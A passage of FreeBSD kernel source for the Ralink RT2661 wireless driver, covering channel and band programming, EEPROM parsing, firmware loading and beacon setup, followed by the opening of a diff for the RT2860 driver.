RT2661_TXRX_CSR4, tmp); } static void rt2661_set_basicrates(struct rt2661_softc *sc, const struct ieee80211_rateset *rs) { #define RV(r) ((r) & IEEE80211_RATE_VAL) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t mask = 0; uint8_t rate; int i; for (i = 0; i < rs->rs_nrates; i++) { rate = rs->rs_rates[i]; if (!(rate & IEEE80211_RATE_BASIC)) continue; mask |= 1 << ieee80211_legacy_rate_lookup(ic->ic_rt, RV(rate)); } RAL_WRITE(sc, RT2661_TXRX_CSR5, mask); DPRINTF(sc, "Setting basic rate mask to 0x%x\n", mask); #undef RV } /* * Reprogram MAC/BBP to switch to a new band. Values taken from the reference * driver. */ static void rt2661_select_band(struct rt2661_softc *sc, struct ieee80211_channel *c) { uint8_t bbp17, bbp35, bbp96, bbp97, bbp98, bbp104; uint32_t tmp; /* update all BBP registers that depend on the band */ bbp17 = 0x20; bbp96 = 0x48; bbp104 = 0x2c; bbp35 = 0x50; bbp97 = 0x48; bbp98 = 0x48; if (IEEE80211_IS_CHAN_5GHZ(c)) { bbp17 += 0x08; bbp96 += 0x10; bbp104 += 0x0c; bbp35 += 0x10; bbp97 += 0x10; bbp98 += 0x10; } if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { bbp17 += 0x10; bbp96 += 0x10; bbp104 += 0x10; } rt2661_bbp_write(sc, 17, bbp17); rt2661_bbp_write(sc, 96, bbp96); rt2661_bbp_write(sc, 104, bbp104); if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { rt2661_bbp_write(sc, 75, 0x80); rt2661_bbp_write(sc, 86, 0x80); rt2661_bbp_write(sc, 88, 0x80); } rt2661_bbp_write(sc, 35, bbp35); rt2661_bbp_write(sc, 97, bbp97); rt2661_bbp_write(sc, 98, bbp98); tmp = RAL_READ(sc, RT2661_PHY_CSR0); tmp &= ~(RT2661_PA_PE_2GHZ | RT2661_PA_PE_5GHZ); if (IEEE80211_IS_CHAN_2GHZ(c)) tmp |= RT2661_PA_PE_2GHZ; else tmp |= RT2661_PA_PE_5GHZ; RAL_WRITE(sc, RT2661_PHY_CSR0, tmp); } static void rt2661_set_chan(struct rt2661_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct rfprog *rfprog; uint8_t bbp3, bbp94 = RT2661_BBPR94_DEFAULT; int8_t power; u_int i, chan; chan = ieee80211_chan2ieee(ic, c); KASSERT(chan != 0 && chan != IEEE80211_CHAN_ANY, ("chan 0x%x", chan)); /* select the appropriate RF settings based on what EEPROM says */ rfprog = (sc->rfprog == 0) ? rt2661_rf5225_1 : rt2661_rf5225_2; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); power = sc->txpow[i]; if (power < 0) { bbp94 += power; power = 0; } else if (power > 31) { bbp94 += power - 31; power = 31; } /* * If we are switching from the 2GHz band to the 5GHz band or * vice-versa, BBP registers need to be reprogrammed. */ if (c->ic_flags != sc->sc_curchan->ic_flags) { rt2661_select_band(sc, c); rt2661_select_antenna(sc); } sc->sc_curchan = c; rt2661_rf_write(sc, RAL_RF1, rfprog[i].r1); rt2661_rf_write(sc, RAL_RF2, rfprog[i].r2); rt2661_rf_write(sc, RAL_RF3, rfprog[i].r3 | power << 7); rt2661_rf_write(sc, RAL_RF4, rfprog[i].r4 | sc->rffreq << 10); DELAY(200); rt2661_rf_write(sc, RAL_RF1, rfprog[i].r1); rt2661_rf_write(sc, RAL_RF2, rfprog[i].r2); rt2661_rf_write(sc, RAL_RF3, rfprog[i].r3 | power << 7 | 1); rt2661_rf_write(sc, RAL_RF4, rfprog[i].r4 | sc->rffreq << 10); DELAY(200); rt2661_rf_write(sc, RAL_RF1, rfprog[i].r1); rt2661_rf_write(sc, RAL_RF2, rfprog[i].r2); rt2661_rf_write(sc, RAL_RF3, rfprog[i].r3 | power << 7); rt2661_rf_write(sc, RAL_RF4, rfprog[i].r4 | sc->rffreq << 10); /* enable smart mode for MIMO-capable RFs */ bbp3 = rt2661_bbp_read(sc, 3); bbp3 &= ~RT2661_SMART_MODE; if (sc->rf_rev == RT2661_RF_5325 || sc->rf_rev == RT2661_RF_2529) bbp3 |= RT2661_SMART_MODE; rt2661_bbp_write(sc, 3, bbp3); if (bbp94 != RT2661_BBPR94_DEFAULT) rt2661_bbp_write(sc, 94, bbp94); /* 5GHz radio needs a 1ms delay here */ if (IEEE80211_IS_CHAN_5GHZ(c)) DELAY(1000); } static void rt2661_set_bssid(struct rt2661_softc *sc, const uint8_t *bssid) { uint32_t tmp; tmp = bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24; RAL_WRITE(sc, RT2661_MAC_CSR4, tmp); tmp = bssid[4] | bssid[5] << 8 | RT2661_ONE_BSSID << 16; RAL_WRITE(sc, RT2661_MAC_CSR5, tmp); } static void rt2661_set_macaddr(struct rt2661_softc *sc, const uint8_t *addr) { uint32_t tmp; tmp = addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24; RAL_WRITE(sc, RT2661_MAC_CSR2, tmp); tmp = addr[4] | addr[5] << 8; RAL_WRITE(sc, RT2661_MAC_CSR3, tmp); } static void rt2661_update_promisc(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; uint32_t tmp; tmp = RAL_READ(sc, RT2661_TXRX_CSR0); tmp &= ~RT2661_DROP_NOT_TO_ME; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2661_DROP_NOT_TO_ME; RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); DPRINTF(sc, "%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? "entering" : "leaving"); } /* * Update QoS (802.11e) settings for each h/w Tx ring. */ static int rt2661_wme_update(struct ieee80211com *ic) { struct rt2661_softc *sc = ic->ic_ifp->if_softc; const struct wmeParams *wmep; wmep = ic->ic_wme.wme_chanParams.cap_wmeParams; /* XXX: not sure about shifts. */ /* XXX: the reference driver plays with AC_VI settings too. */ /* update TxOp */ RAL_WRITE(sc, RT2661_AC_TXOP_CSR0, wmep[WME_AC_BE].wmep_txopLimit << 16 | wmep[WME_AC_BK].wmep_txopLimit); RAL_WRITE(sc, RT2661_AC_TXOP_CSR1, wmep[WME_AC_VI].wmep_txopLimit << 16 | wmep[WME_AC_VO].wmep_txopLimit); /* update CWmin */ RAL_WRITE(sc, RT2661_CWMIN_CSR, wmep[WME_AC_BE].wmep_logcwmin << 12 | wmep[WME_AC_BK].wmep_logcwmin << 8 | wmep[WME_AC_VI].wmep_logcwmin << 4 | wmep[WME_AC_VO].wmep_logcwmin); /* update CWmax */ RAL_WRITE(sc, RT2661_CWMAX_CSR, wmep[WME_AC_BE].wmep_logcwmax << 12 | wmep[WME_AC_BK].wmep_logcwmax << 8 | wmep[WME_AC_VI].wmep_logcwmax << 4 | wmep[WME_AC_VO].wmep_logcwmax); /* update Aifsn */ RAL_WRITE(sc, RT2661_AIFSN_CSR, wmep[WME_AC_BE].wmep_aifsn << 12 | wmep[WME_AC_BK].wmep_aifsn << 8 | wmep[WME_AC_VI].wmep_aifsn << 4 | wmep[WME_AC_VO].wmep_aifsn); return 0; } static void rt2661_update_slot(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint8_t slottime; uint32_t tmp; slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; tmp = RAL_READ(sc, RT2661_MAC_CSR9); tmp = (tmp & ~0xff) | slottime; RAL_WRITE(sc, RT2661_MAC_CSR9, tmp); } static const char * rt2661_get_rf(int rev) { switch (rev) { case RT2661_RF_5225: return "RT5225"; case RT2661_RF_5325: return "RT5325 (MIMO XR)"; case RT2661_RF_2527: return "RT2527"; case RT2661_RF_2529: return "RT2529 (MIMO XR)"; default: return "unknown"; } } static void rt2661_read_eeprom(struct rt2661_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { uint16_t val; int i; /* read MAC address */ val = rt2661_eeprom_read(sc, RT2661_EEPROM_MAC01); macaddr[0] = val & 0xff; macaddr[1] = val >> 8; val = rt2661_eeprom_read(sc, RT2661_EEPROM_MAC23); macaddr[2] = val & 0xff; macaddr[3] = val >> 8; val = rt2661_eeprom_read(sc, RT2661_EEPROM_MAC45); macaddr[4] = val & 0xff; macaddr[5] = val >> 8; val = rt2661_eeprom_read(sc, RT2661_EEPROM_ANTENNA); /* XXX: test if different from 0xffff? */ sc->rf_rev = (val >> 11) & 0x1f; sc->hw_radio = (val >> 10) & 0x1; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; DPRINTF(sc, "RF revision=%d\n", sc->rf_rev); val = rt2661_eeprom_read(sc, RT2661_EEPROM_CONFIG2); sc->ext_5ghz_lna = (val >> 6) & 0x1; sc->ext_2ghz_lna = (val >> 4) & 0x1; DPRINTF(sc, "External 2GHz LNA=%d\nExternal 5GHz LNA=%d\n", sc->ext_2ghz_lna, sc->ext_5ghz_lna); val = rt2661_eeprom_read(sc, RT2661_EEPROM_RSSI_2GHZ_OFFSET); if ((val & 0xff) != 0xff) sc->rssi_2ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_2ghz_corr < -10 || sc->rssi_2ghz_corr > 10) sc->rssi_2ghz_corr = 0; val = rt2661_eeprom_read(sc, RT2661_EEPROM_RSSI_5GHZ_OFFSET); if ((val & 0xff) != 0xff) sc->rssi_5ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_5ghz_corr < -10 || sc->rssi_5ghz_corr > 10) sc->rssi_5ghz_corr = 0; /* adjust RSSI correction for external low-noise amplifier */ if (sc->ext_2ghz_lna) sc->rssi_2ghz_corr -= 14; if (sc->ext_5ghz_lna) sc->rssi_5ghz_corr -= 14; DPRINTF(sc, "RSSI 2GHz corr=%d\nRSSI 5GHz corr=%d\n", sc->rssi_2ghz_corr, sc->rssi_5ghz_corr); val = rt2661_eeprom_read(sc, RT2661_EEPROM_FREQ_OFFSET); if ((val >> 8) != 0xff) sc->rfprog = (val >> 8) & 0x3; if ((val & 0xff) != 0xff) sc->rffreq = val & 0xff; DPRINTF(sc, "RF prog=%d\nRF freq=%d\n", sc->rfprog, sc->rffreq); /* read Tx power for all a/b/g channels */ for (i = 0; i < 19; i++) { val = rt2661_eeprom_read(sc, RT2661_EEPROM_TXPOWER + i); sc->txpow[i * 2] = (int8_t)(val >> 8); /* signed */ DPRINTF(sc, "Channel=%d Tx power=%d\n", rt2661_rf5225_1[i * 2].chan, sc->txpow[i * 2]); sc->txpow[i * 2 + 1] = (int8_t)(val & 0xff); /* signed */ DPRINTF(sc, "Channel=%d Tx power=%d\n", rt2661_rf5225_1[i * 2 + 1].chan, sc->txpow[i * 2 + 1]); } /* read vendor-specific BBP values */ for (i = 0; i < 16; i++) { val = rt2661_eeprom_read(sc, RT2661_EEPROM_BBP_BASE + i); if (val == 0 || val == 0xffff) continue; /* skip invalid entries */ sc->bbp_prom[i].reg = val >> 8; sc->bbp_prom[i].val = val & 0xff; DPRINTF(sc, "BBP R%d=%02x\n", sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } } static int rt2661_bbp_init(struct rt2661_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) int i, ntries; uint8_t val; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { val = rt2661_bbp_read(sc, 0); if (val != 0 && val != 0xff) break; DELAY(100); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < N(rt2661_def_bbp); i++) { rt2661_bbp_write(sc, rt2661_def_bbp[i].reg, rt2661_def_bbp[i].val); } /* write vendor-specific BBP values (from EEPROM) */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0) continue; rt2661_bbp_write(sc, sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } return 0; #undef N } static void rt2661_init_locked(struct rt2661_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp, sta[3]; int i, error, ntries; RAL_LOCK_ASSERT(sc); if ((sc->sc_flags & RAL_FW_LOADED) == 0) { error = rt2661_load_microcode(sc); if (error != 0) { if_printf(ifp, "%s: could not load 8051 microcode, error %d\n", __func__, error); return; } sc->sc_flags |= RAL_FW_LOADED; } rt2661_stop_locked(sc); /* initialize Tx rings */ RAL_WRITE(sc, RT2661_AC1_BASE_CSR, sc->txq[1].physaddr); RAL_WRITE(sc, RT2661_AC0_BASE_CSR, sc->txq[0].physaddr); RAL_WRITE(sc, RT2661_AC2_BASE_CSR, sc->txq[2].physaddr); RAL_WRITE(sc, RT2661_AC3_BASE_CSR, sc->txq[3].physaddr); /* initialize Mgt ring */ RAL_WRITE(sc, RT2661_MGT_BASE_CSR, sc->mgtq.physaddr); /* initialize Rx ring */ RAL_WRITE(sc, RT2661_RX_BASE_CSR, sc->rxq.physaddr); /* initialize Tx rings sizes */ RAL_WRITE(sc, RT2661_TX_RING_CSR0, RT2661_TX_RING_COUNT << 24 | RT2661_TX_RING_COUNT << 16 | RT2661_TX_RING_COUNT << 8 | RT2661_TX_RING_COUNT); RAL_WRITE(sc, RT2661_TX_RING_CSR1, RT2661_TX_DESC_WSIZE << 16 | RT2661_TX_RING_COUNT << 8 | /* XXX: HCCA ring unused */ RT2661_MGT_RING_COUNT); /* initialize Rx rings */ RAL_WRITE(sc, RT2661_RX_RING_CSR, RT2661_RX_DESC_BACK << 16 | RT2661_RX_DESC_WSIZE << 8 | RT2661_RX_RING_COUNT); /* XXX: some magic here */ RAL_WRITE(sc, RT2661_TX_DMA_DST_CSR, 0xaa); /* load base addresses of all 5 Tx rings (4 data + 1 mgt) */ RAL_WRITE(sc, RT2661_LOAD_TX_RING_CSR, 0x1f); /* load base address of Rx ring */ RAL_WRITE(sc, RT2661_RX_CNTL_CSR, 2); /* initialize MAC registers to default values */ for (i = 0; i < N(rt2661_def_mac); i++) RAL_WRITE(sc, rt2661_def_mac[i].reg, rt2661_def_mac[i].val); rt2661_set_macaddr(sc, IF_LLADDR(ifp)); /* set host ready */ RAL_WRITE(sc, RT2661_MAC_CSR1, 3); RAL_WRITE(sc, RT2661_MAC_CSR1, 0); /* wait for BBP/RF to wakeup */ for (ntries = 0; ntries < 1000; ntries++) { if (RAL_READ(sc, RT2661_MAC_CSR12) & 8) break; DELAY(1000); } if (ntries == 1000) { printf("timeout waiting for BBP/RF to wakeup\n"); rt2661_stop_locked(sc); return; } if (rt2661_bbp_init(sc) != 0) { rt2661_stop_locked(sc); return; } /* select default channel */ sc->sc_curchan = ic->ic_curchan; rt2661_select_band(sc, sc->sc_curchan); rt2661_select_antenna(sc); rt2661_set_chan(sc, sc->sc_curchan); /* update Rx filter */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0) & 0xffff; tmp |= RT2661_DROP_PHY_ERROR | RT2661_DROP_CRC_ERROR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2661_DROP_CTL | RT2661_DROP_VER_ERROR | RT2661_DROP_ACKCTS; if (ic->ic_opmode != IEEE80211_M_HOSTAP && ic->ic_opmode != IEEE80211_M_MBSS) tmp |= RT2661_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2661_DROP_NOT_TO_ME; } RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); /* clear STA registers */ RAL_READ_REGION_4(sc, RT2661_STA_CSR0, sta, N(sta)); /* initialize ASIC */ RAL_WRITE(sc, RT2661_MAC_CSR1, 4); /* clear any pending interrupt */ RAL_WRITE(sc, RT2661_INT_SOURCE_CSR, 0xffffffff); /* enable interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0x0000ff10); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0); /* kick Rx */ RAL_WRITE(sc, RT2661_RX_CNTL_CSR, 1); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->watchdog_ch, hz, rt2661_watchdog, sc); #undef N } static void rt2661_init(void *priv) { struct rt2661_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2661_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } void rt2661_stop_locked(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; volatile int *flags = &sc->sc_flags; while (*flags & RAL_INPUT_RUNNING) msleep(sc, &sc->sc_mtx, 0, "ralrunning", hz/10); callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; if (ifp->if_drv_flags & IFF_DRV_RUNNING) { ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* abort Tx (for all 5 Tx rings) */ RAL_WRITE(sc, RT2661_TX_CNTL_CSR, 0x1f << 16); /* disable Rx (value remains after reset!) */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0); RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp | RT2661_DISABLE_RX); /* reset ASIC */ RAL_WRITE(sc, RT2661_MAC_CSR1, 3); RAL_WRITE(sc, RT2661_MAC_CSR1, 0); /* disable interrupts */ RAL_WRITE(sc, RT2661_INT_MASK_CSR, 0xffffffff); RAL_WRITE(sc, RT2661_MCU_INT_MASK_CSR, 0xffffffff); /* clear any pending interrupt */ RAL_WRITE(sc, RT2661_INT_SOURCE_CSR, 0xffffffff); RAL_WRITE(sc, RT2661_MCU_INT_SOURCE_CSR, 0xffffffff); /* reset Tx and Rx rings */ rt2661_reset_tx_ring(sc, &sc->txq[0]); rt2661_reset_tx_ring(sc, &sc->txq[1]); rt2661_reset_tx_ring(sc, &sc->txq[2]); rt2661_reset_tx_ring(sc, &sc->txq[3]); rt2661_reset_tx_ring(sc, &sc->mgtq); rt2661_reset_rx_ring(sc, &sc->rxq); } } void rt2661_stop(void *priv) { struct rt2661_softc *sc = priv; RAL_LOCK(sc); rt2661_stop_locked(sc); RAL_UNLOCK(sc); } static int rt2661_load_microcode(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; const struct firmware *fp; const char *imagename; int ntries, error; RAL_LOCK_ASSERT(sc); switch (sc->sc_id) { case 0x0301: imagename = "rt2561sfw"; break; case 0x0302: imagename = "rt2561fw"; break; case 0x0401: imagename = "rt2661fw"; break; default: if_printf(ifp, "%s: unexpected pci device id 0x%x, " "don't know how to retrieve firmware\n", __func__, sc->sc_id); return EINVAL; } RAL_UNLOCK(sc); fp = firmware_get(imagename); RAL_LOCK(sc); if (fp == NULL) { if_printf(ifp, "%s: unable to retrieve firmware image %s\n", __func__, imagename); return EINVAL; } /* * Load 8051 microcode into NIC. */ /* reset 8051 */ RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, RT2661_MCU_RESET); /* cancel any pending Host to MCU command */ RAL_WRITE(sc, RT2661_H2M_MAILBOX_CSR, 0); RAL_WRITE(sc, RT2661_M2H_CMD_DONE_CSR, 0xffffffff); RAL_WRITE(sc, RT2661_HOST_CMD_CSR, 0); /* write 8051's microcode */ RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, RT2661_MCU_RESET | RT2661_MCU_SEL); RAL_WRITE_REGION_1(sc, RT2661_MCU_CODE_BASE, fp->data, fp->datasize); RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, RT2661_MCU_RESET); /* kick 8051's ass */ RAL_WRITE(sc, RT2661_MCU_CNTL_CSR, 0); /* wait for 8051 to initialize */ for (ntries = 0; ntries < 500; ntries++) { if (RAL_READ(sc, RT2661_MCU_CNTL_CSR) & RT2661_MCU_READY) break; DELAY(100); } if (ntries == 500) { if_printf(ifp, "%s: timeout waiting for MCU to initialize\n", __func__); error = EIO; } else error = 0; firmware_put(fp, FIRMWARE_UNLOAD); return error; } #ifdef notyet /* * Dynamically tune Rx sensitivity (BBP register 17) based on average RSSI and * false CCA count. This function is called periodically (every seconds) when * in the RUN state. Values taken from the reference driver. */ static void rt2661_rx_tune(struct rt2661_softc *sc) { uint8_t bbp17; uint16_t cca; int lo, hi, dbm; /* * Tuning range depends on operating band and on the presence of an * external low-noise amplifier. */ lo = 0x20; if (IEEE80211_IS_CHAN_5GHZ(sc->sc_curchan)) lo += 0x08; if ((IEEE80211_IS_CHAN_2GHZ(sc->sc_curchan) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(sc->sc_curchan) && sc->ext_5ghz_lna)) lo += 0x10; hi = lo + 0x20; /* retrieve false CCA count since last call (clear on read) */ cca = RAL_READ(sc, RT2661_STA_CSR1) & 0xffff; if (dbm >= -35) { bbp17 = 0x60; } else if (dbm >= -58) { bbp17 = hi; } else if (dbm >= -66) { bbp17 = lo + 0x10; } else if (dbm >= -74) { bbp17 = lo + 0x08; } else { /* RSSI < -74dBm, tune using false CCA count */ bbp17 = sc->bbp17; /* current value */ hi -= 2 * (-74 - dbm); if (hi < lo) hi = lo; if (bbp17 > hi) { bbp17 = hi; } else if (cca > 512) { if (++bbp17 > hi) bbp17 = hi; } else if (cca < 100) { if (--bbp17 < lo) bbp17 = lo; } } if (bbp17 != sc->bbp17) { rt2661_bbp_write(sc, 17, bbp17); sc->bbp17 = bbp17; } } /* * Enter/Leave radar detection mode. * This is for 802.11h additional regulatory domains. */ static void rt2661_radar_start(struct rt2661_softc *sc) { uint32_t tmp; /* disable Rx */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0); RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp | RT2661_DISABLE_RX); rt2661_bbp_write(sc, 82, 0x20); rt2661_bbp_write(sc, 83, 0x00); rt2661_bbp_write(sc, 84, 0x40); /* save current BBP registers values */ sc->bbp18 = rt2661_bbp_read(sc, 18); sc->bbp21 = rt2661_bbp_read(sc, 21); sc->bbp22 = rt2661_bbp_read(sc, 22); sc->bbp16 = rt2661_bbp_read(sc, 16); sc->bbp17 = rt2661_bbp_read(sc, 17); sc->bbp64 = rt2661_bbp_read(sc, 64); rt2661_bbp_write(sc, 18, 0xff); rt2661_bbp_write(sc, 21, 0x3f); rt2661_bbp_write(sc, 22, 0x3f); rt2661_bbp_write(sc, 16, 0xbd); rt2661_bbp_write(sc, 17, sc->ext_5ghz_lna ? 0x44 : 0x34); rt2661_bbp_write(sc, 64, 0x21); /* restore Rx filter */ RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); } static int rt2661_radar_stop(struct rt2661_softc *sc) { uint8_t bbp66; /* read radar detection result */ bbp66 = rt2661_bbp_read(sc, 66); /* restore BBP registers values */ rt2661_bbp_write(sc, 16, sc->bbp16); rt2661_bbp_write(sc, 17, sc->bbp17); rt2661_bbp_write(sc, 18, sc->bbp18); rt2661_bbp_write(sc, 21, sc->bbp21); rt2661_bbp_write(sc, 22, sc->bbp22); rt2661_bbp_write(sc, 64, sc->bbp64); return bbp66 == 1; } #endif static int rt2661_prepare_beacon(struct rt2661_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_beacon_offsets bo; struct rt2661_tx_desc desc; struct mbuf *m0; int rate; m0 = ieee80211_beacon_alloc(vap->iv_bss, &bo); if (m0 == NULL) { device_printf(sc->sc_dev, "could not allocate beacon frame\n"); return ENOBUFS; } /* send beacons at the lowest available rate */ rate = IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan) ? 12 : 2; rt2661_setup_tx_desc(sc, &desc, RT2661_TX_TIMESTAMP, RT2661_TX_HWSEQ, m0->m_pkthdr.len, rate, NULL, 0, RT2661_QID_MGT); /* copy the first 24 bytes of Tx descriptor into NIC memory */ RAL_WRITE_REGION_1(sc, RT2661_HW_BEACON_BASE0, (uint8_t *)&desc, 24); /* copy beacon header and payload into NIC memory */ RAL_WRITE_REGION_1(sc, RT2661_HW_BEACON_BASE0 + 24, mtod(m0, uint8_t *), m0->m_pkthdr.len); m_freem(m0); return 0; } /* * Enable TSF synchronization and tell h/w to start sending beacons for IBSS * and HostAP operating modes. */ static void rt2661_enable_tsf_sync(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; if (vap->iv_opmode != IEEE80211_M_STA) { /* * Change default 16ms TBTT adjustment to 8ms. * Must be done before enabling beacon generation. */ RAL_WRITE(sc, RT2661_TXRX_CSR10, 1 << 12 | 8); } tmp = RAL_READ(sc, RT2661_TXRX_CSR9) & 0xff000000; /* set beacon interval (in 1/16ms unit) */ tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2661_TSF_TICKING | RT2661_ENABLE_TBTT; if (vap->iv_opmode == IEEE80211_M_STA) tmp |= RT2661_TSF_MODE(1); else tmp |= RT2661_TSF_MODE(2) | RT2661_GENERATE_BEACON; RAL_WRITE(sc, RT2661_TXRX_CSR9, tmp); } static void rt2661_enable_tsf(struct rt2661_softc *sc) { RAL_WRITE(sc, RT2661_TXRX_CSR9, (RAL_READ(sc, RT2661_TXRX_CSR9) & 0xff000000) | RT2661_TSF_TICKING | RT2661_TSF_MODE(2)); } /* * Retrieve the "Received Signal Strength Indicator" from the raw values * contained in Rx descriptors. The computation depends on which band the * frame was received. Correction values taken from the reference driver. */ static int rt2661_get_rssi(struct rt2661_softc *sc, uint8_t raw) { int lna, agc, rssi; lna = (raw >> 5) & 0x3; agc = raw & 0x1f; if (lna == 0) { /* * No mapping available. * * NB: Since RSSI is relative to noise floor, -1 is * adequate for caller to know error happened. */ return -1; } rssi = (2 * agc) - RT2661_NOISE_FLOOR; if (IEEE80211_IS_CHAN_2GHZ(sc->sc_curchan)) { rssi += sc->rssi_2ghz_corr; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 74; else if (lna == 3) rssi -= 90; } else { rssi += sc->rssi_5ghz_corr; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 86; else if (lna == 3) rssi -= 100; } return rssi; } static void rt2661_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; uint32_t tmp; /* abort TSF synchronization */ tmp = RAL_READ(sc, RT2661_TXRX_CSR9); RAL_WRITE(sc, RT2661_TXRX_CSR9, tmp & ~0xffffff); rt2661_set_bssid(sc, ifp->if_broadcastaddr); } static void rt2661_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); rt2661_enable_tsf_sync(sc); /* XXX keep local copy */ rt2661_set_bssid(sc, vap->iv_bss->ni_bssid); } static void rt2661_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2661_set_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } diff --git a/sys/dev/ral/rt2860.c b/sys/dev/ral/rt2860.c index 300ffc8d9404..e37f820d27f3 100644 --- a/sys/dev/ral/rt2860.c +++ b/sys/dev/ral/rt2860.c @@ -1,4105 +1,4105 @@ /*- * Copyright (c) 2007-2010 Damien Bergamini * Copyright (c) 2012 Bernhard Schmidt * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. * * $OpenBSD: rt2860.c,v 1.65 2010/10/23 14:24:54 damien Exp $ */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2860/RT3090/RT3390/RT3562 chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define RAL_DEBUG #ifdef RAL_DEBUG #define DPRINTF(x) do { if (sc->sc_debug > 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (sc->sc_debug >= (n)) printf x; } while (0) #else #define DPRINTF(x) #define DPRINTFN(n, x) #endif static struct ieee80211vap *rt2860_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rt2860_vap_delete(struct ieee80211vap *); static void rt2860_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int rt2860_alloc_tx_ring(struct rt2860_softc *, struct rt2860_tx_ring *); static void rt2860_reset_tx_ring(struct rt2860_softc 